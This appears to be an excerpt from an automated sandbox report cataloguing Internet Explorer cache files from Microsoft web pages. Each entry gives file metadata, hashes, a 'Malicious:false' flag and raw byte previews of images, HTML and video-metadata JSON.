                                                                                                                                                                                                              SHA-256:11FAF400FC8C627C1D0C121B01B6553225900471B3DA4FD3C15136076F168CC7
                                                                                                                                                                                                              SHA-512:7D8C13B2C3D6BF7AAE75DF8828CC8E1C60D992F27B621AF69B540538A43BF2705C6F6E1A2559BC28DB5A57A9A7832932AC89895468858FC75BB276402CD23E98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qRrT?ver=cee0&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...'...(.....J+.....vPLTE.................................................................................a..k..j..i..w....~......p..j..k..j..u........t..j..p........u..k...v..y..P.,(%++++***+-.i..w..[.,'$++*+**.b..x..g.+('++*,)'.[..x..S.0,*./2.l..^.0,(/...e..i./-+0-+.^..x..x..V.0,)0//.l.._.1,(0.-.f..k.1.,0-*._..w..x..v..y.k..52/MIFH...u..v.\..A=:C>;X...v.I..630k...y..w..x."...{..~.k.......AAA000QQQ......F...z..{.W.......FFF///HHH...I....NNN@@@.......x...........................................................................................................................w..x..x..v..x..{./////..z..z..z..y.,,,...)))***......................w.y....tRNS...|........y......N..S.._........................................................................................................................................,0...................orNT..w.....IDAT8.c`.....#.:....c.P.....l.[..l.f.u...........CS..../...|B[....<~>^..2...0L..(^u."x...i.....H...Au..@u.[..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4qWNO[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 37 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1439
                                                                                                                                                                                                              Entropy (8bit):7.765980595252698
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:32Mwc0LRTuCdcj81tHR3xAPSUns9AQBwRi7HsBkN4mcKfbF1P2hoJ1:3BwcWTuCKj815APds9xBw0j1FJshI
                                                                                                                                                                                                              MD5:9C6EFD87891A9500C7D3D0DB6539F10E
                                                                                                                                                                                                              SHA1:79A1EEED952487FA681DDBD9852730F4503D00E9
                                                                                                                                                                                                              SHA-256:F5BA8BBACBA8023FAB55BE785C2B501FF5C9A12FC504FF123DE0038B16E5040C
                                                                                                                                                                                                              SHA-512:7D274EE4D5233C9AD7E0B5E6157FA38A2DC779A4C3F10E6A0B666C0FE76AA8FB0E4957C10428891A168D45BA47551C3065432035BEFCCD9C16A0619DB156CB6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qWNO?ver=5b3d&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...%...(.....y.3.....pHYs..........+.....QIDATx...k\E......].mjIR..Db@.X.`....i.1."..*TTP.....}0..P..j..Hj~(.D.R.V%..!..1......lOn..f...8..3...9sf...F...y:.N.vtt....H.......?...r..nP.....3D.X{{..Q.....p..."v..}..)PZ.....X/..u...$(...S...Q.De..\.n.67....."=U.....`;,[9{W.-................V./%....3....8c.ZPrz.....;.jX4.O.%.DP9.K%%%.9+.e.t.8..,(.!/.... ._.8P'..$.&.4.....1.......I....^...l.O...i.KT"..b.T7::z.............+.+.......b.....V).$.j......l,l.......Jw1...8??.I._>C.Jz.@..8..6 ....!.+..J......e.L&.ho.X.T.Hj..X.V$...../.T.^*.....E).Vzy...H......._..D.q...o....0..{..>./...(.XZZ.MLL\......oii.{{{.A'.../.............-//.fggg...S.D....**!...Y......7j..x.:...r.y..Z^.B.....%....Z5prttx.e}.V~...i.......#.....N....YEMM.L..>.8..=".JF....DSS......vA.4/..(....U.......i..u... ../...466.777.S...9r`.8..FJ...9.....P..k.nA....h!..%D..?.....H...l|jjJ/..-}/i......`m..,..&.Je.%.tE...hr.R.....NNN.R.*++}.,...~..i..o..|.>..E:kQ6..l..[."z6RJ.D..Z}O...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4r1E5[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 44 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1081
                                                                                                                                                                                                              Entropy (8bit):7.767357331149126
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Gvjb7AnzqG8hQ6dt2nnuxexNBd0byPlnDIIf7RskxoHOrzw/:GvEnGrhFdAnuxeTPPlDllFoHOH8
                                                                                                                                                                                                              MD5:CFACD2DAF2943E0757B9EAB8184D487C
                                                                                                                                                                                                              SHA1:D248CBB1B0E4A1066F5D98941BD2A418B0EFC7C8
                                                                                                                                                                                                              SHA-256:871AB05E9845C224B5384E3B40C7EBD54170762927737D2A75FB0251DABF64FB
                                                                                                                                                                                                              SHA-512:416F4B2710BB19C96A9F579942979599DF7748296EE85868C4C5E6B7EB0E1E142BFA8C061499E6887920D62BBDAE1FF3DA163C4BAA0510AAFEAF9E38649BA5F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4r1E5?ver=326d&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...,...(.............pHYs..........+......IDATx..MHTQ...{3:_*."EA......K.. ..Z.&..h...H...V..]."7-fQ.Q.VQ.#D..].8.cH....i..|.w.76.....s.=.w.;.yc'......*."..2N.y.Fw..j.k.}3.iN...S..~..:.7.G..)+....Mo%I.I.\..[.v..7..>D..Y...Ks`..(.8.hIMD..(...4.D..J.....A.k...J(..I'....`..!.ks`..,p. .W._a.......3U.I...~....h.b.h...k3...$9.....g..v.w....R*..F....*..x.sF....3c..-..#....S..}>s...'n!>.QZ.Pb.x8..Lb.."..h..*..m..i.I...^..7..Oo.=f.J...!@?&...6}.....9.'>....ktm.:W...(.A@.DYn...H.....O.9...y.l..L?..3C....b....+...S..}.e...X/.o!..>.%H95.0.Ls...wP....\....S.i.p.L&;qY.Ie....%I.....I.......Y..0...r..E.......uq.PL.......r.T..."H.....t.....F.w.t....F........n....z..._.r&..ua...\u,..s8..(.....2..z.$C.....j.nmm....u.f.l..\.Y..Y.1......q.R.Xl6.Hl.....w[[.........-...x..k88.`..*..s?.Y....&.......A.$H...-W{.....<.13^Q.z..X.+.Fv...noGGG.....dn.p^.F.9.....:>.Q.8!X.n....R.iK...K5...s~...SpR.R%7.W..].....F.A.-Xed,.N...A].ca.....\D..iMa.A...O.5....u.72..a]
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4sOli[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 1920 x 1080, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):77155
                                                                                                                                                                                                              Entropy (8bit):6.9057558622718975
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:1zAZGc8IEP3PKG7Ww+hd9PydpoxWDMMBSJlnxTiT3aTgC1AflwDHSq4G79:JTj3PlFGyzm1+MgC1XDLDB
                                                                                                                                                                                                              MD5:5C64E9110DA51B44349FC51380F8C3D3
                                                                                                                                                                                                              SHA1:C82F54CE25A8271876CF013F3AC8082ECC1F3CE3
                                                                                                                                                                                                              SHA-256:427D8F3CE7151681B16B8A9233B35BD3EBB679BCE1B43A896A78344F26764DFE
                                                                                                                                                                                                              SHA-512:0A0C77190123D3C251E489ECD7ED59231281E759378C05949801A65716337BB8A5A9A37DD54D7ACB9FD194EDD7516ED3E705E9BF82479ECBF4DED000E72D8147
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sOli?ver=58f2
                                                                                                                                                                                                              Preview: .PNG........IHDR.......8........C....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpDM="http://ns.adobe.com/xmp/1.0/DynamicMedia/". xmlns:stDim="http://ns.adobe.com/xap/1.0/sType/Dimensions#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmpMM:InstanceID="xmp.iid:19c74245-ffe1-8844-9884-7a894ae25166". xmpMM:DocumentID="8388bc40-32b6-5a02-4a3f-313d00000041". xmpMM:OriginalDocumentID="xmp.did:12ed1ee0-a631-6644-8b09-bb04b997112b". xmp:MetadataDate="2020-03-30T15:28:18-07:00". xmp:ModifyDate="2020-03-30T15:28:18-07:00". xmp:CreateDate="2020-03-30T15:27:48-07:00"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4t1lL[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):67718
                                                                                                                                                                                                              Entropy (8bit):5.42820203111561
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:4HmIRbJ9Zm4nzKF5ZHwKhoLGYhz3jEj9TNfHx7EmI9oNUvBbX:4lRvLUfYh5
                                                                                                                                                                                                              MD5:ED5F4B6F3265C7E28104753F84B03763
                                                                                                                                                                                                              SHA1:C816C19D6BE54E249C20C43183B122678399FD66
                                                                                                                                                                                                              SHA-256:87E30665278B3BFE90C17B3DE28DA4BCCE04023BA89B9A7777CF74A020D7D855
                                                                                                                                                                                                              SHA-512:D24EAB8BB45CF2756CCF38C9D446B2EAD119ADC56C49ED6FE0365CD21DB4535DCCE1CAE8CC167D4F378EC5E1E7EFCC9A9A9035546EFFF5358A63A0D28E3A8327
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/en-us/videoplayer/embed/RE4t1lL?pid=ocpVideo0-innerdiv-oneplayer&jsapi=true&postJsllMsg=true&maskLevel=20&market=en-us
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="en-us" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;b51a4ef2-f048-4717-a855-ae6f64d49c55&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;en-us&quot;,&quot;l&quot;:&quot;en-us&quot;,&quot;mu&quot;:&quot;en-us&quot;,&quot;rp&quot;:&quot;/en-us/videoplayer/embed/RE4t1lL&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title></title>.. ..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4t1lL[2].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4888
                                                                                                                                                                                                              Entropy (8bit):5.19644113687613
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AxtrjozrjLGMreyFrey/prey3zreyBmDrxp1LUFeyUFndUFRaUFtCRpF249PFo+a:AZoTLGyUyIyey2rxDLqeyqndqRaqtCRA
                                                                                                                                                                                                              MD5:7401DF7D851EDA2490C60E7B9834B0EE
                                                                                                                                                                                                              SHA1:BEBB7B1D779982D7822D4785C19231BC1CEE92D9
                                                                                                                                                                                                              SHA-256:BC4668896C817D905F235112308FCCA047A1F1B84C1D0F8C9BE0EB5882360051
                                                                                                                                                                                                              SHA-512:860AA96301646BE7515DDFEE29D9CE9A80B2D3064D609EE9ED0AF4A199B49CF7D86E7FF2A05F78B74D35C0D594B31FE1EE3E2C112CDE9FACD51108AA16EB2F25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4t1lL
                                                                                                                                                                                                              Preview: {"captions":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4t1lL-enus?ver=c0f5","link":{"href":"/vhs/api/videos//captions/en-us","method":"GET","rel":"self"}}},"transcripts":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4t1lL-tscriptenus?ver=9854","link":{"href":"/vhs/api/videos//transcripts/en-us","method":"GET","rel":"self"}}},"snippet":{"activeStartDate":"2020-06-30T19:46:28","culture":"en-us","supplier":{"name":"","source":{"name":""}},"thumbnails":{"extrasmall":{"height":0,"width":0,"assetId":"RE4sOli","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sOli?ver=58f2","link":{"href":"/vhs/api/videos//thumbnails/extrasmall","method":"GET","rel":"self"}},"small":{"height":0,"width":0,"assetId":"RE4sOli","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sOli?ver=58f2","link":{"href":"/vhs/api/videos//thumbnails/sm
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4tWN0[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=12, height=730, bps=158, PhotometricIntepretation=RGB, orientation=upper-left, width=1300], baseline, precision 8, 1300x730, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):398309
                                                                                                                                                                                                              Entropy (8bit):7.892288915000026
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:7EFjUIpvcdPWMeHE+qFFLV0o1E14lGSxV+EmUmaFORjTocLceTzeuFEO0LxVH:7EXViMxZo1E14lGSmEmUmsmAocCDSH
                                                                                                                                                                                                              MD5:C8856BB199A5F55FDF8B988B3A25B507
                                                                                                                                                                                                              SHA1:46406EDB6248CE93F3771AF1D019C69F5E5BDEA3
                                                                                                                                                                                                              SHA-256:00ED24A1E4E60F4E4FA388035AAC5E8B07DCDB6A697754F39378D9BC9BB9818B
                                                                                                                                                                                                              SHA-512:31D603AAF02D67D5EA689E29F042A08DB811979BC1D2FF1B5469351E54B285314CC224DBA2DC5844CC176A1ACCFA22F36308DE4B6199DF98833378D2F76D424F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b
                                                                                                                                                                                                              Preview: ......Exif..II*.......................................................................................................(...........1...........2...........i........... ..............'.......'..Adobe Photoshop 21.1 (Windows).2020:04:09 20:11:04............0231................................................................n...........v...(...................~...........1.......H.......H.............Adobe_CM......Adobe.d.................................................................................................................................................Z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....D..tN.ZRg..Nhp.=...o...r+...).5.......1.6\..........%...........Z.i.s.4t.g..O
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4tZqs[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4697
                                                                                                                                                                                                              Entropy (8bit):5.2050625467985885
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:AxwrjOGEre+Urre+U/Xre+U3xre+UB4rxpLLUMyU1dUzaULCRpg49Pm+MPfpecKS:AOO++UW+UC+U4+U2rxRLPyCduaUCR64a
                                                                                                                                                                                                              MD5:22D5D8B53A1E0BB5EFB9ED9541CB242E
                                                                                                                                                                                                              SHA1:CD2C70D66108368074C91A406F8B13154C9D39DC
                                                                                                                                                                                                              SHA-256:55C794150CA6D29C83DC45C94CBA27B34BAED2E578A502A8625B5D37C4A5C73C
                                                                                                                                                                                                              SHA-512:909BD1CB667E0A6D430855599F56EE5664581F9BC65C3997589BA93660E0D4C8F29437F6EC2F53EE905773E672039213D1514D6DE2273ABEC547C62DB6FB8024
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: {"captions":{},"transcripts":{"en-us":{"url":"https://prod-video-cms-rt-microsoft-com.akamaized.net/cms/api/am/videofiledata/RE4tZqs-tscriptenus?ver=7fa4","link":{"href":"/vhs/api/videos//transcripts/en-us","method":"GET","rel":"self"}}},"snippet":{"activeStartDate":"2021-03-24T02:30:28","culture":"en-us","supplier":{"name":"","source":{"name":""}},"thumbnails":{"extrasmall":{"height":0,"width":0,"assetId":"RE4tWN0","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b","link":{"href":"/vhs/api/videos//thumbnails/extrasmall","method":"GET","rel":"self"}},"small":{"height":0,"width":0,"assetId":"RE4tWN0","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b","link":{"href":"/vhs/api/videos//thumbnails/small","method":"GET","rel":"self"}},"medium":{"height":0,"width":0,"assetId":"RE4tWN0","url":"http://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tWN0?ver=466b","link":{"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RE4zdQ4[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):35997
                                                                                                                                                                                                              Entropy (8bit):7.9734525409690775
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:m7NCxTCIfwc6387fLq5ewDH0noMcw4N6E76fh5FF:m7gCywcxHWDUoMwGfzFF
                                                                                                                                                                                                              MD5:93F0623C34D8AB25B7E108C6122039B0
                                                                                                                                                                                                              SHA1:0C49900536BED23C9CCBF49D55D72AA873F814E8
                                                                                                                                                                                                              SHA-256:ACD05F9614A6F77158628158899D81A6834FB20F3DC683520FEE55A03560D333
                                                                                                                                                                                                              SHA-512:C1B846C0B03CAA038C261E7544158D00A6DACD4CDFD7907D14CE0759BC4AE4E6220E640EE13ED426D4315F363CB1117E1CA39AFB059946AE5054AE6E45345022
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zdQ4?ver=ebd4&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%....................................................................%%2..............................................................%%2...........".......................................................................................UP.....y.@....C........0....OrT5..'.......6.| ...?...........`.........;....=......q.6..ol......?&.................mo.q...g.......[|.k...................w..W6.....D_..;&.dJ*QR."-(.C.0.....h(..AJ-).}w.y..Kg..#...DUTT...h.Z*Qi^..r1TJQ.hQ(QhQ.u.....-~E...y.(....".R..R.Z...m.bR.U)D....B..P........]..M..)E(PU........mD}e..V...uE.......}.t_A.....t....~.._.}....6..~:......br.q....mru...f"..}%.~l.v?..N..b..h...N..b.O..k./.;.........\.....,?m....3.i.=...]L.....r.t....9.X...iZ......""".*.*.%.(.k^....2O..D.2.6.i{.[...5.[a..l3....~E....."%".q."Q.(..F..?q..*.DZ".EZ-(.]3.~.{J.._j=.X.5.Q..#."*%..j.!....Q..Qb.i.....`.P..i.1...D......tDEDJ"....u/r.Op%..^..M..;..m8.U7.0./.Kp?.......DQ"X.DDDDDDTD.%u.......mC...~...l......M
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWAn3f[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 1259 x 472, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):219833
                                                                                                                                                                                                              Entropy (8bit):7.984201038748569
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:qeGeMACZ0KkhqcQJ7ECMZswi8eBebkpT8empxboiW8G3D0vvv4l4Nvvy5LyTruy8:QZ90qNJEZ9i8q3pTXmfo99YwyRKyTgD
                                                                                                                                                                                                              MD5:55E23F825B6FCB9B33774FE8DE272CB4
                                                                                                                                                                                                              SHA1:34A55B1B013C9C3F073B516074320D86CD7BF115
                                                                                                                                                                                                              SHA-256:1D7B585251B9B75F3F0C8317EE87DB520ADCE70D5C6E225B13C9451C3C7E4735
                                                                                                                                                                                                              SHA-512:47F41AE3EC530F73228DD9DF861F7D19EF56E12B0EC0EF9FE401576BCC4E40FBE49BD180167A806E0639A01109A1E8734F8D96239D964894BAFB7253542FE7B8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWAn3f?ver=86c9&q=0&m=8&h=472&w=1259&b=%23FFFFFFFF&l=f&x=0&y=281&s=3000&d=1125&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR..............Jl.....pHYs..........+......IDATx...e.u....[.n...^O..."ER.).aX..9..;.......6..c`.p..c F.+..;p..,..eS.(..%..c.:..^.m.o.5.......Ci.[g..s...nN.yV.q...SR...A ... ...@...A ... ...@........nA...A ... ...@...A ... ...@...A..$X..!... ...@...A ... ...@...A .........A ... ...@...A ... ...@...A ....A ... ...@...A ... ...@...A`M.H.nM.D...A ... ...@...A ... ...@.........A ... ...@...A ... ...@...k.@.ukr!bF...A ... ...@...A ... ...@.H...@...A ... ...@...A ... ...@.X....[...3.@...A ... ...@...A ... ...@.u...@...A ... ...@...A ... ..... .`.\.....@...A ... ...@...A ... .....=...@...A ... ...@...A ... .........B. ...@...A ... ...@...A ... .`]. ...@...A ... ...@...A ... .&.$X.&."f.. ...@...A ... ...@...A .....r... ...@...A ... ...@...A ...5A ..5..1#... ...@...A ... ...@...A .$X.{ ... ...@...A ... ...@...A .........A ... ...@...A ... ...@...A ....A ... ...@...A ... ...@...A`M.H.nM.D...A ... ...@...A ... ...@.........A ... ...@...A ... ...@...k.@.ukr!bF...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWAx5Y[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):12135
                                                                                                                                                                                                              Entropy (8bit):7.941440215298478
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:voBHDXJpLo5luQsQakmDtHBtP5u6nwm4MF4/Luu1m33915jlesSnIZ8:is5luQsQakmh46nwF9/6u1O91kQ8
                                                                                                                                                                                                              MD5:E17F43B266AC05346398870458F97173
                                                                                                                                                                                                              SHA1:353785FE135B1B0FF08768B97DC034B2D194AD15
                                                                                                                                                                                                              SHA-256:12B7176ACAFDE8DE1E91176E5D7CA13754309934EF096B86017C03A8765C3C4F
                                                                                                                                                                                                              SHA-512:8FAC334E4DC767AFA790143F81D34E7336703DD6D486C8F76D44AAC9DAB878190F9907C5D7FE5709D45892B015250B303E4EAF8C74683C62EC9A469602BE18F2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWAx5Y?ver=1ca9&q=90&m=6&h=201&w=358&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%....................................................................%%2..............................................................%%2........f..".................................................. ....7.~..sY..[..O..0.....|.o.....i....|.z......ip...&.]...g.k...I.....).M..\.2..?K...3.E....0o..._...........T....B...oU...Mz...y{~j ....G.k..".ww...][.;.m......>.n6...;...J{k..b..r...9.._.k.N.......z<X..#%.......s.Z.i...zeb.....Q...c.AD..O7P...|............5...6G.rcJ..w..l..@...V.%.....;.._.m....9...S.L.4.......f..S..~..l.&.....n.')...*..vk N.E....'...._P.......S.w...!..U.>lH[.m..kd..2B.z....'f"w.t.8..'Y..`HP."...IK.)..pXVEKqq.~..A...^.....T..;..'jv...mH.....Hr.vQ..;..|*.r....).P"O..[...i.....A..........IK"'|.......[!o~..-S.^cM.OM..U...I....zA.....y.T^%...%e&...o...7;=913....J...n8..P...:N..5;P.T.)......3=R....0..C.|%....q[......6.a.3...J.F...G..V...Q{..C.b.l.gV.{.J.cvn.2].C..g...s.m..^..W..i...;o..&.j...U3Vs.O ]..Vr?j>..].6.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWBLKL[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 358x201, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6397
                                                                                                                                                                                                              Entropy (8bit):7.848563675149255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:1kGiDk2S9cWlkGN5agXCv6D3PgEax6kWow5NY7S0s+IWFxa3EuXRnQXFJrN:r2M3R5aga6UEaAhow5y7/qMCXeDJ
                                                                                                                                                                                                              MD5:705B4D2A9844B0A38C0CBE8BA7EB66D8
                                                                                                                                                                                                              SHA1:A4F9D11F4B05106BB0D6B7C24DAC430BF9265DA8
                                                                                                                                                                                                              SHA-256:305B679A6AD464160602B748F9766BAC1F98B86B51C65B3ABE874B789168853C
                                                                                                                                                                                                              SHA-512:00FCF2CC43E3AC2FF4649F3213F95C5865ABAC08853FD25B05D10D7D2544B76105B9E6492C13C69E5FE4FA9F51041E1087AD7C2F1DE327B79B36CA8188E1975F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWBLKL?ver=ba81&q=90&m=6&h=201&w=358&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................".."+)+88K.......................................................".."+)+88K........f.."..................................................`.........................+J..(....?...!j..!n.!n..>...<.....n........8.....[.!..4......4....-}M..1.i.J>A}......y.O.T.Ms........ ...,.}')JU.S.^;..S.V.......,@..<A.....w...:.....b....z.7.......?1.l]..k.|....q..my..;P.........m\.7..Mk.n...x........M...Sc..qx..f_...d...|..-..M1q.$.f7....}.............7.d..ddK..A......<.!.Y.B0..w.|....*.!HY.9AIf......t.ljJ...f.Y..,.3 .Mcb...z...czC...c.+.(.0.vV..Ohs@.h.L..1......E.w#..6.iJF..c......................................................................!Z............W..m.....i......./..V.Z=^..|.q7.H.......$.........................................................|8'0.ayk.c.k..6...G...).~[n..@.m...........;U4.e...C.%)8................1.............................!1...2@..A."#0 $p%..................k.............
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\RWBtR2[1].htm
